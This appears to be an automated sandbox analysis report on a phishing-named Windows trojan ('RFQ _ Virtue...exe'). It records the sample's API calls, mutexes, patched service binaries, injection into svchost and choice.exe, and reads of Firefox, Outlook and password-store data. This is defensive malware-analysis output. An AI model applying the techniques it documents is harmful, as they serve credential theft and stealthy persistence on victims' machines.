Source: elevation_service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: RFQ _ Virtue 054451000085.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: DiagnosticsHub.StandardCollector.Service.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winEXE@12/13@10/7

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00B9CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00B9CBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

File created: C:\Users\user\AppData\Roaming\902dfe32f8c88b11.bin

Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-902dfe32f8c88b119e7986a9-b
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-902dfe32f8c88b11-inf
Source: C:\Windows\System32\AppVClient.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-902dfe32f8c88b119ea72c54-b

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

File created: C:\Users\user~1\AppData\Local\Temp\aut8E66.tmp

Jump to behavior

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: choice.exe, 00000010.00000003.2170835715.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.2172223460.000000000271C000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.2172223460.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.2170003056.000000000271C000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2744008676.00000000026E8000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2744008676.000000000271C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: RFQ _ Virtue 054451000085.exe	ReversingLabs: Detection: 81%
Source: RFQ _ Virtue 054451000085.exe	Virustotal: Detection: 75%

Source: unknown	Process created: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"
Source: C:\Windows\SysWOW64\choice.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe"	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Process created: C:\Windows\SysWOW64\choice.exe "C:\Windows\SysWOW64\choice.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\alg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appvpolicy.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\AppVClient.exe	Section loaded: appmanagementconfiguration.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\System32\AppVClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\choice.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: RFQ _ Virtue 054451000085.exe

Static file information: File size 1801728 > 1048576

Source: RFQ _ Virtue 054451000085.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: choice.pdbGCTL source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1491077999.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: AppVClient.pdbGCTL source: AppVClient.exe.0.dr
Source:	Binary string: ALG.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: AppVClient.pdb source: AppVClient.exe.0.dr
Source:	Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1518745124.0000000004190000.00000004.00001000.00020000.00000000.sdmp, DiagnosticsHub.StandardCollector.Service.exe.0.dr
Source:	Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1530790654.0000000004180000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iavbXasnTxCeiF.exe, 0000000D.00000002.2742686051.000000000021E000.00000002.00000001.01000000.00000005.sdmp, iavbXasnTxCeiF.exe, 00000011.00000000.2031373413.000000000021E000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: FXSSVC.pdbGCTL source: FXSSVC.exe.0.dr
Source:	Binary string: wntdll.pdbUGP source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1534604945.0000000005060000.00000004.00001000.00020000.00000000.sdmp, RFQ _ Virtue 054451000085.exe, 00000000.00000003.1532831867.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 0000000A.00000003.1839279919.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003B9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1841739814.0000000003800000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1950383835.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1953424906.0000000004257000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000003.1948543283.00000000040A4000.00000004.00000020.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.000000000459E000.00000040.00001000.00020000.00000000.sdmp, choice.exe, 00000010.00000002.2751812627.0000000004400000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\a\_work\e\src\out\Release_x64\elevation_service.exe.pdbOGP source: elevation_service.exe.0.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\elevation_service.exe.pdb source: elevation_service.exe0.0.dr
Source:	Binary string: FXSSVC.pdb source: FXSSVC.exe.0.dr
Source:	Binary string: ALG.pdb source: RFQ _ Virtue 054451000085.exe, 00000000.00000003.1495810480.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source:	Binary string: choice.pdb source: svchost.exe, 0000000A.00000003.1915858203.000000000342B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000003.1914993695.000000000341A000.00000004.00000020.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000003.1891549691.00000000014A5000.00000004.00000001.00020000.00000000.sdmp, iavbXasnTxCeiF.exe, 0000000D.00000002.2748610451.000000000148E000.00000004.00000020.00020000.00000000.sdmp

Source: alg.exe.0.dr

Static PE information: 0xF67E8745 [Tue Jan 18 10:28:21 2101 UTC]

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe

Code function: 0_2_00404B37 LoadLibraryA,GetProcAddress,

0_2_00404B37

Source: elevation_service.exe.0.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe.0.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe.0.dr	Static PE information: section name: .retplne
Source: elevation_service.exe.0.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe.0.dr	Static PE information: section name: malloc_h
Source: armsvc.exe.0.dr	Static PE information: section name: .didat
Source: alg.exe.0.dr	Static PE information: section name: .didat
Source: FXSSVC.exe.0.dr	Static PE information: section name: .didat
Source: elevation_service.exe0.0.dr	Static PE information: section name: .00cfg
Source: elevation_service.exe0.0.dr	Static PE information: section name: .gxfg
Source: elevation_service.exe0.0.dr	Static PE information: section name: .retplne
Source: elevation_service.exe0.0.dr	Static PE information: section name: _RDATA
Source: elevation_service.exe0.0.dr	Static PE information: section name: malloc_h

Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00428945 push ecx; ret	0_2_00428958
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00402F12 push es; retf	0_2_00402F13
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B7B180 push 00B7B0CAh; ret	0_2_00B7B061
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B7B180 push 00B7B30Dh; ret	0_2_00B7B1E6
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B7B180 push 00B7B2F2h; ret	0_2_00B7B262
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B7B180 push 00B7B255h; ret	0_2_00B7B2ED
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B7B180 push 00B7B2D0h; ret	0_2_00B7B346
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B7B180 push 00B7B37Fh; ret	0_2_00B7B3B7
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B9852Eh; ret	0_2_00B97F3A
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B98514h; ret	0_2_00B97F66
Source: C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe	Code function: 0_2_00B98550 push 00B97E66h; ret	0_2_00B98057
